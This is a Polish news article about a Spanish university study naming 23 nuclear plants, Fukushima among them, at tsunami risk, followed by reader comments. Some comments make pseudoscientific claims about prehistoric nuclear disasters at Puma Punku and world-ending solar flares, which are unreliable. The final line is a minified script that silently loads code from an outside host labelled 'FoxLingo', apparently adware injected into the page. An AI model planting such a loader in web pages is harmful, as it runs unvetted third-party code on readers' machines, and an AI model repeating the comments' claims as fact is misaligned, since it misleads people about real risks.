23 elektrownie atomowe na świecie mogą podzielić los Fukushimy

Kategorie: 

źródło: dreamstime.com

Według najnowszych ustaleń ponad 23 elektrownie atomowe na świecie mogą podzielić los japońskiej elektrowni "Fukushima", która w marcu 2011 roku, w następstwie trzęsienia ziemi i tsunami została poważnie uszkodzona Jest to konkluzja osiągnięta przez ekspertów z Uniwersytetu Huelva w Hiszpanii.

Na liście zagrożonych elektrowni znalazły się 23 zakłady razem z "Fukushima". W sumie są na ich terenie 74 reaktory jądrowe. Trzynaście z tych elektrowni planuje jeszcze zwiększyć ilość pracujących reaktorów.

 

Jak zauważono w badaniu większość potencjalnie niebezpiecznych elektrowni jądrowych, jest na Bliskim Wschodzie i Południowo-Wschodniej Azji, gdzie w każdej chwili może się wydarzyć tsunami. Liderem liczby takich elektrowni są Chiny, w których jest w budowie aż 27 reaktorów narażonych na działanie żywiołów

 

Nie mniej poważna sytuacja jest w Japonii, gdzie znajduje się siedem z takich feralnie zlokalizowanych elektrowni jądrowych. Jedna z nie jest jeszcze w budowie. Dwa podobne zakłady gdzie powstają nowe reaktory, znajdują się w Korei Południowej.

 

Autorzy badania starają się nakłonić swoje rządy do refleksji na temat tego, co zrobią w razie awarii jądrowej.  Zagrożone są nie tylko kraje goszczące reaktory, ponieważ z powodu wycieków promieniowania może się to przenieść na całą planetę.

 

Ocena: 

Nie ma jeszcze ocen
Opublikował: admin
Portret użytkownika admin

Redaktor naczelny i założyciel portalu zmianynaziemi.pl a także innemedium.pl oraz wielu innych. Specjalizuje się w tematyce naukowej ze szczególnym uwzględnieniem zagrożeń dla świata. Zwolennik libertarianizmu co często wprost wynika z jego felietonów na tematy bieżące. Admina można również czytać na Twitterze   @lecterro


Komentarze

Portret użytkownika flat

Jesteśmy skończeni w obliczu

Jesteśmy skończeni w obliczu spodziewanego hiper rozblysku słonecznego, który ma spowodować pozbawienie nas źródeł energii, a co za tym idzie możliwości efektywnego chłodzenia prętów paliwowych w reaktorach. My nie cofniemy się do epoki kamienia, my przeżyjemy istny Hell on the Earth. Teraz jest już za późno na wycofanie się z planu energii jądrowej a bezpieczna utylizacja odpadów z tego ustrojstwa jest praktycznie niemożliwa. W tym miejscu polecam film "Jądro wieczności" http://iptak.pl/film-online/jadro-wiecznosci-into-eternity-2010/  traktujący o problemie  odpadów radioaktywnych.Wydaje mi się również iż taki scenariusz mógł byc powodem starcia z powierzchni ziemi poprzednich cywilizacji - defekt reaktorów - na co wskazuja materiały opisujące chociażby odkryte złoża zużytego uranu sprzed paru tysięcy lat (?!)w afryce, a także ślady po niezidentyfikowanych katastrofach nuklearnych na takich monumentalnych budowlach jak Puma Punku czy Tiahuanaco (krystalizacja piasku w kwarc itp )  

Portret użytkownika flat

Jeśli dojdzie do

Jeśli dojdzie do przewidywanego mega rozbłysku na Słońcu, a co za tym idzie pozbawienie nas źródeł energii elektrycznej, jak damy radę chłodzić pręty paliwowe w reaktorach ? W takich okolicznościach nie zostaniemy cofnięci do epoki kamienia, a (nie)przeżyjemy wręcz Hell on the Earth z tym, że zamaist ognia piekielnego dopadnie nas "niewidzialny przeciwnik" promieniowanie.

Portret użytkownika b@ron

sami zgotujemy sobie koniec

sami zgotujemy sobie koniec świata,ciekawi mnie jaki plan mają ci którzy budują elektrownie atomowe w takich miejscach ,na wypadek całkowitego zniszczenia elektrowni przez żywioł typu trzesienie ziemi czy tsunami .ludzie bzdury piszą o przebiegunowaniu ziemi w tym roku i o kataklizmach które nas nawiedzą ,jesli w tym byłoby choc odrobine prawdy to nawet gdybysmy przeżyli to właśnie takie elektrownie nas zabiją więc może pora poszukać innego żródła energi, a zresztą po co szukać ...słońce ma jej za dużo może pora to wykorzystać???

Portret użytkownika mando

Wokół Polski jest 9

Wokół Polski jest 9 elektrowni. Ciekawym co sie sie z nimi stanie.Także każdej strony coś może przywiac jak sie popsuje.

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

Skomentuj